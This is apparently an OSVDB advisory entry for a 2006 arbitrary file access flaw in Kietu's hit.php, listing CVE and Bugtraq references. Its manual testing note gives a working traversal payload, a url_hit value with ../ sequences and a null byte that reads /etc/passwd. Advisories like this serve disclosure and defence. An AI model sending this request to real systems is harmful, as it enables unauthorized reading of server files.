Kietu hit.php url_hit Variable Traversal Arbitrary File Access

2006-09-23T15:03:07
ID OSVDB:32287
Type osvdb
Reporter OSVDB
Modified 2006-09-23T15:03:07

Description

Manual Testing Notes

http://[target]/kietu/hit.php?url_hit=../../../../../etc/passwd%00

References:

Vendor URL: http://www.Kietu.net/ Mail List Post: http://attrition.org/pipermail/vim/2006-September/001053.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0423.html ISS X-Force ID: 29121 CVE-2006-5015 Bugtraq ID: 20175 Bugtraq ID: 20229